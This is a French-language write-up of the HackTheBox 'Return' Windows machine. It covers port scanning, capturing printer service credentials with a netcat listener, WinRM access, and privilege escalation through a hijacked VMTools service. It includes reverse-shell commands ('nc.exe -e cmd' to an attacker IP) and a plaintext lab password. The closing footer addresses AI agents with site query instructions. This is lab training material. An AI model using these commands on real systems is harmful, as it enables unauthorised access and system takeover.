> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/writeups-ctf/hackthebox/windows-easy/return-hackthebox-writeup.md).

# Compte rendu HackTheBox de Return

{% embed url="<https://app.hackthebox.com/machines/Return>" %}

{% hint style="warning" %}
**Compétences :**

* Abus d'imprimante réseau
* Abus du groupe Server Operators
* Gestion de la configuration des services
  {% endhint %}

## Reconnaissance

**Configuration de l'espace de travail :**

Configurez l'espace de travail en créant trois dossiers pour stocker le contenu important, les exploits et les résultats de reconnaissance Nmap.

<figure><img src="/files/6f15bf20e4394355b0830e996d464efebba0a503" alt="" width="563"><figcaption></figcaption></figure>

**Vérification de la connectivité VPN**

Vérifiez la connectivité VPN pour assurer une communication stable avec la machine cible.

<figure><img src="/files/708a4357343d576824d8bb6458af7df2fa411144" alt="" width="563"><figcaption></figcaption></figure>

**Découverte des ports ouverts avec Nmap :**

Énumérez les ports ouverts et exportez les résultats dans le fichier "allPorts" du répertoire Nmap :

```bash
nmap -p- --open -sS -n -Pn -vvv --min-rate 5000 10.10.11.108 -oG allPorts
```

<figure><img src="/files/ce1fe710f6736d8288252c5635112b7d92cfad44" alt=""><figcaption></figcaption></figure>

**Analyse des ports ouverts avec extractPorts :**

Utilisez la fonction extractPorts pour afficher les ports ouverts dans un format concis et les copier dans le presse-papiers.

<figure><img src="/files/178b3a64560272275d8d97b215c2c82dc1191bf5" alt=""><figcaption></figcaption></figure>

**Scan de version des ports avec Nmap :**

Utilisez Nmap pour analyser les versions des services et enregistrer la sortie dans le fichier "targeted" :

```bash
nmap -sCV -p53,80,88,135,139,389,445,464,593,636,3268,5985,9389,47001,49664,49665,49666,49668,49671,49674,49675,49679,49682,4969 10.10.11.108 -oN targeted
```

<figure><img src="/files/800fcc1692daf5b574301aa729643078b5fef9df" alt=""><figcaption></figcaption></figure>

Pour résoudre les noms de domaine en adresses IP via DNS, le nom de domaine associé à son adresse IP est inséré dans le `/etc/hosts` le fichier

<figure><img src="/files/2fb06299d00b17bacf0cd786c68520f389a24197" alt="" width="563"><figcaption></figcaption></figure>

#### Port 80 :

<figure><img src="/files/a9c5ff2121698142545b141dfeb5c46c32771921" alt=""><figcaption></figcaption></figure>

## Abus d'imprimante réseau

Dans la configuration du port 80, une configuration du serveur pointant vers `print.return.local` via le port 389 est découverte.

<figure><img src="/files/1ebc0456eb8913aaaa2ab2ca9435c6f8a6ffedfe" alt=""><figcaption></figcaption></figure>

**Écouter le port 389** / En plaçant `netcat` sur le port 389

```bash
nc -nlvp 389
```

* Une connexion est reçue, révélant les identifiants d'un `svc-printer` utilisateur avec le `1edFg43012!!` mot de passe.

<figure><img src="/files/7992959ba37611200bc60d0c1e110cf37be091ea" alt="" width="542"><figcaption></figcaption></figure>

**Vérification de l'identifiant avec WinRM**

Comme le port WinRM (5985) est ouvert, les identifiants sont vérifiés avec `crackmapexec`:

```bash
crackmapexec winrm 10.10.11.108 -u 'svc-printer' -p '1edFg43012!!'
```

* La réponse « pwned » confirme la validité des identifiants.

<figure><img src="/files/ffbeda9ce60f7914bdb0a1a7d36ade864f004a14" alt=""><figcaption></figcaption></figure>

**Connexion via Evil-WinRM**

En utilisant `evil-winrm` pour obtenir une session shell avec `svc-printer`:

<pre class="language-bash"><code class="lang-bash"><strong>evil-winrm -i 10.10.11.108 -u 'svc-printer' -p '1edFg43012!!'
</strong></code></pre>

<figure><img src="/files/5e4595582e7f8f0ef614b07d42e450a776d4087c" alt=""><figcaption></figcaption></figure>

### Drapeau user.txt :)

<figure><img src="/files/acace3859ba9432366e0cc6ea57b6bcd04709c54" alt="" width="563"><figcaption></figcaption></figure>

## Élévation de privilèges (niveaux d'intégrité) :

{% embed url="<https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/integrity-levels>" %}

**Audit des groupes de membres**/ Le `whoami /groups` La commande indique que l'utilisateur appartient au `Mandatory Label/High Mandatory Level` groupe, lui permettant de gérer les services.

<figure><img src="/files/1146f4e571a7a0dcde8ec673ddaedf3a09c8ff8a" alt=""><figcaption></figcaption></figure>

**Manipulation des services pour l'élévation de privilèges**/ L'utilisateur peut potentiellement modifier un service et le redémarrer pour exécuter une commande avec des privilèges plus élevés.

<figure><img src="/files/269900b504c13f12dba0fc0892c591214c8ff777" alt=""><figcaption></figcaption></figure>

**Création d'un service**/ Une tentative de création d'un service de shell inversé est effectuée avec `sc.exe`, mais sans les droits nécessaires :

<pre class="language-powershell"><code class="lang-powershell"><strong>sc.exe create reverse binPath="C:/Users/svc-printer/Desktop/nc.exe -e cmd 10.10.14.26 443"
</strong></code></pre>

<figure><img src="/files/7e80ce0c13959cbade870eabf5ee964c7605c57c" alt=""><figcaption></figcaption></figure>

**Modification du service VMTools**/ Pour exploiter un service existant, `nc.exe` est transféré sur la machine cible, puis le `VMTools` service est modifié pour exécuter un shell inversé :

* **Transfert de Netcat**

```bash
cp /home/jordan/Desktop/htb/artic/scripts/netcat/nc.exe .
```

```powershell
upload /home/jordan/Desktop/htb/return/content/nc.exe
```

<figure><img src="/files/7b5ce4546a9b94f178958377dc724d89bcf2884b" alt=""><figcaption></figcaption></figure>

L'idée ici est de rediriger l'exécutable d'un service pour exécuter une commande de shell inversé, ce qui peut vous donner une session avec des privilèges élevés si le service s'exécute avec `SYSTEM` des privilèges.

```powershell
sc.exe config VMTools binPath="C:/Users/svc-printer/Desktop/nc.exe -e cmd 10.10.14.26 443"
```

<figure><img src="/files/6771ffbfdd4eabb9cd08d7636bcc6ca17bbf9e4d" alt=""><figcaption></figcaption></figure>

**Redémarrer le service**/ Après configuration, le service est redémarré pour lancer le shell :

<pre class="language-powershell"><code class="lang-powershell">sc.exe stop VMTools
<strong>sc.exe start VMTools
</strong></code></pre>

Écouter le port 443 pour les connexions entrantes :

```bash
sudo rlwrap nc -nlvp 443
```

<figure><img src="/files/130dd665761fc410230ca73d0c01275663741d52" alt=""><figcaption></figcaption></figure>

### Flag root :)

<figure><img src="/files/0a30f2c73a70d2d2cf49c1f8bc2570e19ca4c47c" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/4375b4cb0ff2dda5a285c7f52e426e9c136f16b3" alt="" width="536"><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/writeups-ctf/hackthebox/windows-easy/return-hackthebox-writeup.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
